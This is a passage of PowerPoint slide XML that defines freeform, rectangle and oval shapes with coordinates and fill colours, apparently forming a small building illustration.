                    <a:gd name="T13" fmla="*/ 0 h 799"/>
                    <a:gd name="T14" fmla="*/ 766 w 950"/>
                    <a:gd name="T15" fmla="*/ 135 h 799"/>
                    <a:gd name="T16" fmla="*/ 950 w 950"/>
                    <a:gd name="T17" fmla="*/ 135 h 799"/>
                    <a:gd name="T18" fmla="*/ 950 w 950"/>
                    <a:gd name="T19" fmla="*/ 168 h 799"/>
                    <a:gd name="T20" fmla="*/ 908 w 950"/>
                    <a:gd name="T21" fmla="*/ 168 h 799"/>
                    <a:gd name="T22" fmla="*/ 908 w 950"/>
                    <a:gd name="T23" fmla="*/ 799 h 799"/>
                    <a:gd name="T24" fmla="*/ 43 w 950"/>
                    <a:gd name="T25" fmla="*/ 799 h 799"/>
                    <a:gd name="T26" fmla="*/ 43 w 950"/>
                    <a:gd name="T27" fmla="*/ 168 h 799"/>
                    <a:gd name="T28" fmla="*/ 0 w 950"/>
                    <a:gd name="T29" fmla="*/ 168 h 799"/>
                    <a:gd name="T30" fmla="*/ 0 w 950"/>
                    <a:gd name="T31" fmla="*/ 135 h 799"/>
                    <a:gd name="T32" fmla="*/ 522 w 950"/>
                    <a:gd name="T33" fmla="*/ 1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0" h="799">
                      <a:moveTo>
                        <a:pt x="522" y="135"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="522" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="626" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="626" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="662" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="662" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="766" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="766" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="950" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="950" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="908" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="908" y="799"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="43" y="799"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="43" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="522" y="135"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">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29" name="Freeform 38"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7208994" y="5725160"/>
                  <a:ext cx="1163209" cy="976265"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 525 w 952"/>
                    <a:gd name="T1" fmla="*/ 135 h 799"/>
                    <a:gd name="T2" fmla="*/ 525 w 952"/>
                    <a:gd name="T3" fmla="*/ 0 h 799"/>
                    <a:gd name="T4" fmla="*/ 629 w 952"/>
                    <a:gd name="T5" fmla="*/ 0 h 799"/>
                    <a:gd name="T6" fmla="*/ 629 w 952"/>
                    <a:gd name="T7" fmla="*/ 135 h 799"/>
                    <a:gd name="T8" fmla="*/ 664 w 952"/>
                    <a:gd name="T9" fmla="*/ 135 h 799"/>
                    <a:gd name="T10" fmla="*/ 664 w 952"/>
                    <a:gd name="T11" fmla="*/ 0 h 799"/>
                    <a:gd name="T12" fmla="*/ 766 w 952"/>
                    <a:gd name="T13" fmla="*/ 0 h 799"/>
                    <a:gd name="T14" fmla="*/ 766 w 952"/>
                    <a:gd name="T15" fmla="*/ 135 h 799"/>
                    <a:gd name="T16" fmla="*/ 952 w 952"/>
                    <a:gd name="T17" fmla="*/ 135 h 799"/>
                    <a:gd name="T18" fmla="*/ 952 w 952"/>
                    <a:gd name="T19" fmla="*/ 168 h 799"/>
                    <a:gd name="T20" fmla="*/ 910 w 952"/>
                    <a:gd name="T21" fmla="*/ 168 h 799"/>
                    <a:gd name="T22" fmla="*/ 910 w 952"/>
                    <a:gd name="T23" fmla="*/ 799 h 799"/>
                    <a:gd name="T24" fmla="*/ 43 w 952"/>
                    <a:gd name="T25" fmla="*/ 799 h 799"/>
                    <a:gd name="T26" fmla="*/ 43 w 952"/>
                    <a:gd name="T27" fmla="*/ 168 h 799"/>
                    <a:gd name="T28" fmla="*/ 0 w 952"/>
                    <a:gd name="T29" fmla="*/ 168 h 799"/>
                    <a:gd name="T30" fmla="*/ 0 w 952"/>
                    <a:gd name="T31" fmla="*/ 135 h 799"/>
                    <a:gd name="T32" fmla="*/ 525 w 952"/>
                    <a:gd name="T33" fmla="*/ 1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2" h="799">
                      <a:moveTo>
                        <a:pt x="525" y="135"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="525" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="629" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="629" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="664" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="664" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="766" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="766" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="952" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="952" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="910" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="910" y="799"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="43" y="799"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="43" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="135"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:cu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0" name="Rectangle 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8670336" y="5381818"/>
                  <a:ext cx="1058129" cy="1319606"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="6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1" name="Rectangle 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8617797" y="5341497"/>
                  <a:ext cx="1163209" cy="40322"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:lumMod val="50000"/>
                    <a:lumOff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2" name="Rectangle 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9253163" y="6435059"/>
                  <a:ext cx="138070" cy="266365"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:lumMod val="50000"/>
                    <a:lumOff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3" name="Rectangle 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9013678" y="6435059"/>
                  <a:ext cx="138070" cy="266365"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:lumMod val="50000"/>
                    <a:lumOff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4" name="Rectangle 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8776638" y="5500338"/>
                  <a:ext cx="854078" cy="138070"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:lumMod val="50000"/>
                    <a:lumOff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5" name="Rectangle 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8776638" y="5737379"/>
                  <a:ext cx="854078" cy="138070"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:lumMod val="50000"/>
                    <a:lumOff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6" name="Rectangle 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8776638" y="5976863"/>
                  <a:ext cx="854078" cy="135627"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:lumMod val="50000"/>
                    <a:lumOff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7" name="Rectangle 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8776638" y="6212681"/>
                  <a:ext cx="854078" cy="135627"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:lumMod val="50000"/>
                    <a:lumOff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8" name="Rectangle 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8842618" y="5176546"/>
                  <a:ext cx="410544" cy="164951"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="0072C6">
                    <a:lumMod val="75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39" name="Rectangle 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7380053" y="4689026"/>
                  <a:ext cx="1055684" cy="2012399"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="DD5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0" name="Rectangle 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7959215" y="6435059"/>
                  <a:ext cx="139292" cy="266365"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="8E2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1" name="Rectangle 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7723397" y="6435059"/>
                  <a:ext cx="135626" cy="266365"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="8E2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2" name="Rectangle 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="5500338"/>
                  <a:ext cx="854078" cy="138070"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="8E2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3" name="Rectangle 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="5737379"/>
                  <a:ext cx="854078" cy="138070"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="8E2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4" name="Rectangle 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="5976863"/>
                  <a:ext cx="854078" cy="135627"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="8E2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5" name="Rectangle 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="6212681"/>
                  <a:ext cx="854078" cy="135627"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="8E2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6" name="Rectangle 57"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="5027479"/>
                  <a:ext cx="854078" cy="135627"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="8E2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7" name="Rectangle 58"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="5263298"/>
                  <a:ext cx="854078" cy="135627"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="8E2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8" name="Rectangle 61"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="4790439"/>
                  <a:ext cx="854078" cy="138070"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="8E2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49" name="Rectangle 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5420195" y="4447097"/>
                  <a:ext cx="1059350" cy="2254328"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="00B2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0" name="Rectangle 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6003021" y="6435059"/>
                  <a:ext cx="135626" cy="266365"/>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1" name="Rectangle 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5763537" y="6435059"/>
                  <a:ext cx="138070" cy="266365"/>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2" name="Rectangle 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="5500338"/>
                  <a:ext cx="854078" cy="138070"/>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3" name="Rectangle 69"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="5737379"/>
                  <a:ext cx="854078" cy="138070"/>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4" name="Rectangle 70"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="5976863"/>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5" name="Rectangle 71"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="6212681"/>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6" name="Rectangle 72"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="5027479"/>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7" name="Rectangle 73"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="5263298"/>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8" name="Rectangle 74"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="4553398"/>
                  <a:ext cx="854078" cy="135627"/>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59" name="Rectangle 75"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="4790439"/>
                  <a:ext cx="854079" cy="138071"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="0082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0" name="Rectangle 76"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8586028" y="6634222"/>
                  <a:ext cx="398325" cy="67204"/>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1" name="Rectangle 77"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6479546" y="6634222"/>
                  <a:ext cx="1142437" cy="67203"/>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2" name="Rectangle 79"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5318780" y="5044584"/>
                  <a:ext cx="101414" cy="1654198"/>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3" name="Freeform 84"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4592805" y="6455831"/>
                  <a:ext cx="48873" cy="184501"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 40"/>
                    <a:gd name="T1" fmla="*/ 0 h 151"/>
                    <a:gd name="T2" fmla="*/ 40 w 40"/>
                    <a:gd name="T3" fmla="*/ 0 h 151"/>
                    <a:gd name="T4" fmla="*/ 40 w 40"/>
                    <a:gd name="T5" fmla="*/ 151 h 151"/>
                    <a:gd name="T6" fmla="*/ 0 w 40"/>
                    <a:gd name="T7" fmla="*/ 151 h 151"/>
                    <a:gd name="T8" fmla="*/ 0 w 40"/>
                    <a:gd name="T9" fmla="*/ 0 h 151"/>
                    <a:gd name="T10" fmla="*/ 0 w 40"/>
                    <a:gd name="T11" fmla="*/ 0 h 151"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="40" h="151">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="40" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="151"/>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4" name="Oval 85"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4479167" y="6290880"/>
                  <a:ext cx="248037" cy="24559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5" name="Oval 86"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4514602" y="6163807"/>
                  <a:ext cx="180835" cy="18205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6" name="Freeform 87"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4763048" y="6510814"/>
                  <a:ext cx="35434" cy="129518"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 29"/>
                    <a:gd name="T1" fmla="*/ 0 h 106"/>
                    <a:gd name="T2" fmla="*/ 29 w 29"/>
                    <a:gd name="T3" fmla="*/ 0 h 106"/>
                    <a:gd name="T4" fmla="*/ 29 w 29"/>
                    <a:gd name="T5" fmla="*/ 106 h 106"/>
                    <a:gd name="T6" fmla="*/ 0 w 29"/>
                    <a:gd name="T7" fmla="*/ 106 h 106"/>
                    <a:gd name="T8" fmla="*/ 0 w 29"/>
                    <a:gd name="T9" fmla="*/ 0 h 106"/>
                    <a:gd name="T10" fmla="*/ 0 w 29"/>
                    <a:gd name="T11" fmla="*/ 0 h 106"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="29" h="106">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="29" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="106"/>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7" name="Oval 88"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4694624" y="6394738"/>
                  <a:ext cx="169838" cy="17350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8" name="Oval 89"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4717839" y="6307986"/>
                  <a:ext cx="123407" cy="12707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69" name="Freeform 90"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11396912" y="6464383"/>
                  <a:ext cx="48874" cy="184501"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 40"/>
                    <a:gd name="T1" fmla="*/ 0 h 151"/>
                    <a:gd name="T2" fmla="*/ 40 w 40"/>
                    <a:gd name="T3" fmla="*/ 0 h 151"/>
                    <a:gd name="T4" fmla="*/ 40 w 40"/>
                    <a:gd name="T5" fmla="*/ 151 h 151"/>
                    <a:gd name="T6" fmla="*/ 0 w 40"/>
                    <a:gd name="T7" fmla="*/ 151 h 151"/>
                    <a:gd name="T8" fmla="*/ 0 w 40"/>
                    <a:gd name="T9" fmla="*/ 0 h 151"/>
                    <a:gd name="T10" fmla="*/ 0 w 40"/>
                    <a:gd name="T11" fmla="*/ 0 h 151"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="40" h="151">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="40" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="151"/>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0" name="Oval 91"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11295497" y="6299434"/>
                  <a:ext cx="248038" cy="24559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1" name="Oval 92"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11330931" y="6169916"/>
                  <a:ext cx="180835" cy="18205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2" name="Freeform 93"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11489161" y="6514883"/>
                  <a:ext cx="35434" cy="129518"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 29"/>
                    <a:gd name="T1" fmla="*/ 0 h 106"/>
                    <a:gd name="T2" fmla="*/ 29 w 29"/>
                    <a:gd name="T3" fmla="*/ 0 h 106"/>
                    <a:gd name="T4" fmla="*/ 29 w 29"/>
                    <a:gd name="T5" fmla="*/ 106 h 106"/>
                    <a:gd name="T6" fmla="*/ 0 w 29"/>
                    <a:gd name="T7" fmla="*/ 106 h 106"/>
                    <a:gd name="T8" fmla="*/ 0 w 29"/>
                    <a:gd name="T9" fmla="*/ 0 h 106"/>
                    <a:gd name="T10" fmla="*/ 0 w 29"/>
                    <a:gd name="T11" fmla="*/ 0 h 106"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
